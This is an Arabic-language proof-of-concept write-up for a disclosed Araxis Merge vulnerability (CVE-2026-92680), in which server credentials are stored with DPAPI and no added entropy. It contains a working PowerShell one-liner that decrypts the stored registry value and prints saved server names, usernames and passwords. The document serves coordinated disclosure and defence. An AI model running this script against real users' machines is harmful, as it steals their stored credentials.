
إثبات مفهوم لفك تشفير بيانات اعتماد الخادم المحمية بـ DPAPI في Araxis Merge (CVE-2026-92680)، مما يوضح تخزين بيانات الاعتماد غير المحمية بشكل كافٍ على Windows.
يقوم Araxis Merge for Windows بتخزين بيانات اعتماد الخادم باستخدام DPAPI مع تعيين pOptionalEntropy إلى NULL. وهذا يسمح لأي تعليمات برمجية تعمل في سياق المستخدم نفسه بفك تشفيرها.
التحليل الكامل: https://grepstrength.com/research/araxis-merge
| CVE | CVE-2026-92680 |
| CWE | CWE-522: بيانات اعتماد محمية بشكل غير كافٍ |
| CVSS v3.1 | 5.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) |
| المورّد | Araxis Ltd. |
| المتأثر | Araxis Merge for Windows 2011.4074 حتى 2026.0 |
| تم الإصلاح في | 2026.1 |
| إشعار المورّد | Merge-SA-26-00 |
| تاريخ الإبلاغ | 2026-08-18 |
| تاريخ الكشف | 2026-XX-XX |
| المُبلِّغ | grepStrength |
سيقوم هذا بفك تشفير وتحليل HKCU\Software\Araxis\Merge\7.1\Passwords. يجب تشغيل هذا بنفس مستخدم Windows الذي خزّن بيانات الاعتماد في الأصل.
Add-Type -AssemblyName System.Security; $p=[Security.Cryptography.ProtectedData]::Unprotect((Get-ItemProperty "HKCU:\Software\Araxis\Merge\7.1").Passwords,$null,'CurrentUser'); $i=48; $f=@(); while($i -lt $p.Length){$l=[BitConverter]::ToInt64($p,$i+8);$i+=16;$f+=[Text.Encoding]::Unicode.GetString($p,$i,$l*2);$i+=$l*2}; 0..($f.Count/4-1)|%{[PSCustomObject]@{Server=$f[$_*4+1];Username=$f[$_*4+2];Password=$f[$_*4+3]}}|Format-Table -AutoSize
تم إجراء جميع الاختبارات على أنظمة مملوكة لـ grepStength Security باستخدام بيانات اعتماد اصطناعية فقط. تم الإبلاغ عن هذا إلى Araxis Ltd. والكشف عنه علنًا بعد توفر الإصلاح.
MIT